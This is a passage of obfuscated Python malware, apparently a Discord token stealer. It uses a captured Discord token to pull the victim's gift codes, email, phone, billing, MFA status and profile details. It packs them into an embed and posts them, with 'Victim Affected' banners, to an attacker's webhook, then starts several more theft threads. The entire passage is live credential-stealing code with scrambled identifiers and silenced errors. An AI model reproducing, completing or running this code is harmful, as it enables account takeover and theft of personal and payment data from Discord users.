                        LLGEMQWTFCWCOABGKZESLSXZLRNFGYPCNABLUINCJQEXPZRBBYNOIELNUMUQNUQOCXXMCDPZXZQJCABLLODCBSYM.append('Other')
                LLGEMQWTFCWCOABGKZESLSXZLRNFGYPCNABLUINCJQEXPZRBBYNOIELNUMUQNUQOCXXMCDPZXZQJCABLLODCBSYM = ' / '.join(LLGEMQWTFCWCOABGKZESLSXZLRNFGYPCNABLUINCJQEXPZRBBYNOIELNUMUQNUQOCXXMCDPZXZQJCABLLODCBSYM)
            else:
                LLGEMQWTFCWCOABGKZESLSXZLRNFGYPCNABLUINCJQEXPZRBBYNOIELNUMUQNUQOCXXMCDPZXZQJCABLLODCBSYM = "None"
        except:
            LLGEMQWTFCWCOABGKZESLSXZLRNFGYPCNABLUINCJQEXPZRBBYNOIELNUMUQNUQOCXXMCDPZXZQJCABLLODCBSYM = "None"

        try:
            MYRSTOEHTPIUCOZHFMNQWFNOGIAGJPRYPKICRRCBPXGKUEPLRLZNMNVWIDVLYKIGYGIUGFERMTAYQQOMOBGBJX = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ_d15c0rd}).json()
            if MYRSTOEHTPIUCOZHFMNQWFNOGIAGJPRYPKICRRCBPXGKUEPLRLZNMNVWIDVLYKIGYGIUGFERMTAYQQOMOBGBJX:
                GCGPZGDNIEIJNQYSHVMPKUSCCMSAIYKTYKDICRMRRZWZEBUEIKTWKPXGFBJYCXORNDAQOBJXBLGAQSCFOO = []
                for ATTQGOREIFHGVLLFOMVOMNPWQLIEKHIAWBEHNJTLMZNVOEJARKLCVCOPSITZALWBKYRSWVWLAGNXXLNXTZXB in MYRSTOEHTPIUCOZHFMNQWFNOGIAGJPRYPKICRRCBPXGKUEPLRLZNMNVWIDVLYKIGYGIUGFERMTAYQQOMOBGBJX:
                    XRXOKJHQLAREIQZAMHEQBWTQCEZLTTOAPLCREWCHLFQOOGOUYMEOBHQUIIHFUOZPLPFJCAIBLKJDKPBFTIXUSLCMFWLEMRZU = ATTQGOREIFHGVLLFOMVOMNPWQLIEKHIAWBEHNJTLMZNVOEJARKLCVCOPSITZALWBKYRSWVWLAGNXXLNXTZXB['promotion']['outbound_title']
                    ATTQGOREIFHGVLLFOMVOMNPWQLIEKHIAWBEHNJTLMZNVOEJARKLCVCOPSITZALWBKYRSWVWLAGNXXLNXTZXB = ATTQGOREIFHGVLLFOMVOMNPWQLIEKHIAWBEHNJTLMZNVOEJARKLCVCOPSITZALWBKYRSWVWLAGNXXLNXTZXB['code']
                    GRSFDUFMVTMMMUFLPHSYVPQKWJXPNMACKVURHUFOIKROOFLDYCDBMUNDNFAHBRQBGZJMYFIVYHFANYKMREONKGDYL = f"Gift: {XRXOKJHQLAREIQZAMHEQBWTQCEZLTTOAPLCREWCHLFQOOGOUYMEOBHQUIIHFUOZPLPFJCAIBLKJDKPBFTIXUSLCMFWLEMRZU}\nCode: {ATTQGOREIFHGVLLFOMVOMNPWQLIEKHIAWBEHNJTLMZNVOEJARKLCVCOPSITZALWBKYRSWVWLAGNXXLNXTZXB}"
                    if len('\n\n'.join(ATTQGOREIFHGVLLFOMVOMNPWQLIEKHIAWBEHNJTLMZNVOEJARKLCVCOPSITZALWBKYRSWVWLAGNXXLNXTZXB)) + len(GRSFDUFMVTMMMUFLPHSYVPQKWJXPNMACKVURHUFOIKROOFLDYCDBMUNDNFAHBRQBGZJMYFIVYHFANYKMREONKGDYL) >= 1024:
                        break
                    GCGPZGDNIEIJNQYSHVMPKUSCCMSAIYKTYKDICRMRRZWZEBUEIKTWKPXGFBJYCXORNDAQOBJXBLGAQSCFOO.append(GRSFDUFMVTMMMUFLPHSYVPQKWJXPNMACKVURHUFOIKROOFLDYCDBMUNDNFAHBRQBGZJMYFIVYHFANYKMREONKGDYL)
                if len(GCGPZGDNIEIJNQYSHVMPKUSCCMSAIYKTYKDICRMRRZWZEBUEIKTWKPXGFBJYCXORNDAQOBJXBLGAQSCFOO) > 0:
                    ATTQGOREIFHGVLLFOMVOMNPWQLIEKHIAWBEHNJTLMZNVOEJARKLCVCOPSITZALWBKYRSWVWLAGNXXLNXTZXB = '\n\n'.join(GCGPZGDNIEIJNQYSHVMPKUSCCMSAIYKTYKDICRMRRZWZEBUEIKTWKPXGFBJYCXORNDAQOBJXBLGAQSCFOO)
                else:
                    ATTQGOREIFHGVLLFOMVOMNPWQLIEKHIAWBEHNJTLMZNVOEJARKLCVCOPSITZALWBKYRSWVWLAGNXXLNXTZXB = "None"
            else:
                ATTQGOREIFHGVLLFOMVOMNPWQLIEKHIAWBEHNJTLMZNVOEJARKLCVCOPSITZALWBKYRSWVWLAGNXXLNXTZXB = "None"
        except:
            ATTQGOREIFHGVLLFOMVOMNPWQLIEKHIAWBEHNJTLMZNVOEJARKLCVCOPSITZALWBKYRSWVWLAGNXXLNXTZXB = "None"
    
        v4r_software_name, BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ = YBJCKHDEGNMIBHQKKROGKHHFOYMIUJMVEZRRZFIBKXRIVZDLSPQPHRZREMYR.get(BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ_d15c0rd, ("Unknown Software", "Unknown location"))

        embed = Embed(title=f'Discord Token {TYLFBQTVURAEDBAFSETVLKPIXLEXWBQDMNHCMZXNRJXYGUTFBLDVXGOWEGVVWNY}:', color=CNGIQMZWQABBSLBBFQMWMWKSIBGLNDWRIILGXPCZINGIIDAWMEWLAATGXPUEIKSAEYBGWAWUMZEHBQWVVKYMFVWWPYILCKE)      
        embed.add_field(name=":file_folder: Path:", value=f"```{BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ}```", inline=True)
        embed.add_field(name=":globe_with_meridians: Token:", value=f"```{BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ_d15c0rd}```", inline=True)
        embed.add_field(name=":package: Software:", value=f"```{v4r_software_name}```", inline=True)
        embed.add_field(name=":bust_in_silhouette: Username:", value=f"```{APPEMRPPRKLGQVJRZBIUMEOHUFVXDHJWQFSQPYMOIIJAWEEDLQTZQGOTFXTCHMPSBLCPSSMLBPMZRRNIGDDUKDJDPUGXNDJV}```", inline=True)
        embed.add_field(name=":bust_in_silhouette: Display Name:", value=f"```{OJYRWDTQYIUNXSSKFYYPXAQMFHXCXIRMGDZGLTEDZNXWYLSBLKKD}```", inline=True)
        embed.add_field(name=":robot: Id:", value=f"```{IFPJZROAVYVROBAJAWYWPTPRMNWBXKJHTAWABBHXHQFHGKMBGYPVJTQBFDVANAERDSFIAQIZCERECRZY}```", inline=True)
        embed.add_field(name=":e_mail: Email:", value=f"```{PVTJWTLLGUBIGVFPVERKRIPCRJSIETAREQQWFBORMTSJIMPMBIUWGBIPOBCUASLKRYRSXP}```", inline=True)
        embed.add_field(name=":white_check_mark: Email Verified:", value=f"```{PFAPDUSRKLDRMDCHZUIZEQFKXKVHJTUOUMFQLNHPTFYFDTQDEXHSLXKMNPBPPGEGYOAUZLMEJ}```", inline=True)
        embed.add_field(name=":telephone_receiver: Phone:", value=f"```{KVVCXHFKCNXPPBXKAZRERJGOWSLBFBRUTRNXOQESWOUXHAEFMFHWTWIRAUNQG}```", inline=True)   
        embed.add_field(name=":rocket: Nitro:", value=f"```{BJRRAJAULLGHAFXWRVVCTWAEFUTGIZGZDVDDVATFHJPQWHTWFPPLWSHSMOLXLOEYCKJBSECTWILWAZYAYBRAWQCS}```", inline=True)
        embed.add_field(name=":earth_africa: Language:", value=f"```{HGQOZTTNYVIMBIVUOSLFBLRARXYAMPEZHMXJZGOUXHDJQABGTVHBJXZGISH}```", inline=True)
        embed.add_field(name=":moneybag: Billing:", value=f"```{LLGEMQWTFCWCOABGKZESLSXZLRNFGYPCNABLUINCJQEXPZRBBYNOIELNUMUQNUQOCXXMCDPZXZQJCABLLODCBSYM}```", inline=True)
        embed.add_field(name=":gift: Gift Code:", value=f"```{ATTQGOREIFHGVLLFOMVOMNPWQLIEKHIAWBEHNJTLMZNVOEJARKLCVCOPSITZALWBKYRSWVWLAGNXXLNXTZXB}```", inline=True)
        embed.add_field(name=":lock: Multi-Factor Authentication:", value=f"```{EOUSBZWPOYNJKJTBOEHPICAGWJINTLQGIHUEGDUNLINOTUNFGOFIQJZRXLTJU}```", inline=True)
        embed.add_field(name=":frame_photo: Profile Picture:", value=f"", inline=False)
        embed.set_image(url=IOJGQGFZSEUOTSCCBKPJBGFZTTWGAZELEAVQNLSOGJIVBWFLLNHOBUOFYHFPBRWWAMJWSJAHNTCUWSJYNQB)
        embed.set_footer(text=ZVVWAXALAQTAWHCNJNTVYHIKZCGQFAYFBMGNYULLXHCTJZOOGFICBXLMCXGSAIFVRRL, icon_url=AGCWWPPELOWOBUYKLTVWMLSRFFABYYSOVKCBKXUFXYOROIKXYEJIHJGLTSOXRICDUJNMRH)
        UVFBPFHFGZAPYHOFKWHMEPFVVVTEGMBCGYARZVJSHEQQGNZKOSBVKCYUBMGRTUFQKWBBAIWBFYEFONEBPSYCTQQTZHY.send(embed=embed, username=OFOXPTBNYNBKKRWGGWEYDBCVTOMPKWMQERQMDQAZMWCLMQFETCWCRMXBFRSRLJRUHBTWRGDULOSUZGPPIYQAKUEF, avatar_url=AGCWWPPELOWOBUYKLTVWMLSRFFABYYSOVKCBKXUFXYOROIKXYEJIHJGLTSOXRICDUJNMRH)

try: requests.post(UOWXOTBXLCGVMGVSJTFTIWEPLKECGUQIZXXFXIQCNQKNPYKNVVEQPPISVRIKBSYVZ, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': OFOXPTBNYNBKKRWGGWEYDBCVTOMPKWMQERQMDQAZMWCLMQFETCWCRMXBFRSRLJRUHBTWRGDULOSUZGPPIYQAKUEF, 'avatar_url': AGCWWPPELOWOBUYKLTVWMLSRFFABYYSOVKCBKXUFXYOROIKXYEJIHJGLTSOXRICDUJNMRH,})
except: pass
try: threading.Thread(target=OUVCKJZQLKNWWWTJLJKBGONPTYUEWAGLZAFKLVQRDLVRRGAVCFDWISSGHGAQLZ).start()
except: pass
try: threading.Thread(target=PKMGPZZGSFGUEGINJRSPRUTSLVTLUFIJFNHEXCQQYBYNIWUQJJFLJYICCBLHSNNIQQUXBLIHQIS).start()
except: pass
try: threading.Thread(target=HEBFXAPTJJFTZVOIOZGRLICOHMFDWFJBGTIMBEDHXZZPGOQQLTBUSJIAODMPXWFEZHBETMWRXZVDNTBXHHNYVZKCZQMBVNQPG).start()
except: pass
try: threading.Thread(target=CXOEAQCFBGEEBRMKFMDPUEIWQEVMQTDVPOQRBVRTSMHCGTAWHPJAIZFCYGLJUFUCVWSEJSHWJAZUNHBVHCNSKLCJXMRBEEQUEBNG).start()
except: pass
try: JNNREVBPYUNCQPQCJRTTBSMPNWELLAREAODTZQAUCXPHWZUAFOKNPYHBEDIVPGXEGUSYZZHXV()
except: pass
try: TSHVHDUBAQFZXDMUMZIQZKIZKYJHDLNWFAPPDNTHJMMGXRQURLPBVMIRULZB()
except: pass
try: XHENCNJKBGOATCJLCKRYLEWXPQTWXATTWPMYRUWIJWUOQNXFLNJGJTFLOQYEJPWSXVEYWQCCESBYOG()
except: pass
try: QGBLTSEOYTCZSEMCSMJXPWKWDIZZGDCCHGPPCSXQDEDQJYUAGNTAKAAXYNPRJLJCOXEOHRDIXWVSEXASCLLKYRPFLMZVPL()
except: pass
try: RWDNOXQGYMHWIUCSSESRYTIUGLLZBVHIOYVBADKDXAXFGOGEBCLINBLSITBBLYWOPXHUAO()
except: pass
try: QREOWUDBMOELXKTDAWQLHIJERFAEWFPMOFFSQBZTNKBHVSMCOJVSRZGKNKPYVHVSPTDVSSVBPYWIDIDHUPLODXMBECNSK()
except: pass
try: KVCWYTPDMQTOZEMOKNXMNKXOTHLEZZVEBJABMPEEARBBEPHIFRCMB()
except: pass
try: YBUJSDKEBJJJMRAYNHXLBMJMDRNZNRPFAQMXIHIBCWGTOIRTJSTGTSWZCJCZWGMQEMYMLAZMEJUOJMKJHSZCVLUMMKCUFFS()
except: pass
try: requests.post(UOWXOTBXLCGVMGVSJTFTIWEPLKECGUQIZXXFXIQCNQKNPYKNVVEQPPISVRIKBSYVZ, json={'content': f'****╚══════════════════{PRTBOXKURAFYWZXZFZGARAHYGZPOWWAYVFMWNLZKVRVBKSESEDCMN}══════════════════╝****', 'username': OFOXPTBNYNBKKRWGGWEYDBCVTOMPKWMQERQMDQAZMWCLMQFETCWCRMXBFRSRLJRUHBTWRGDULOSUZGPPIYQAKUEF, 'avatar_url': AGCWWPPELOWOBUYKLTVWMLSRFFABYYSOVKCBKXUFXYOROIKXYEJIHJGLTSOXRICDUJNMRH})
except: pass
try: threading.Thread(target=CYIFPBZHBCTHCDZRTGOUUQIQRLPENJZWSJERIJXKOYRCIGRDMSCQXAUVCSRBOLNRFLWQOZXFGJOVAV).start()
except: pass
try: threading.Thread(target=CNCDRDBJMNIZBRWKOKJODBSCUHLCBDPKLJTGILRBBADLHIZIWOAZQC).start()
except: pass
try: threading.Thread(target=XDURHPFKJWXEZYUYOGWRFDEGSYUPOYDEENANGRZUBTMZGZNGWTVBKKYEPNIUKGXKPJGSGWBBQBUAVTKG).start()
except: pass
try: threading.Thread(target=EEJSXRKETJJLHTBPZIXYQRLQYMJMKLVTUPCNUKAVUUGGBDUZARCDDWAROWBHEQVH).start()
except: pass
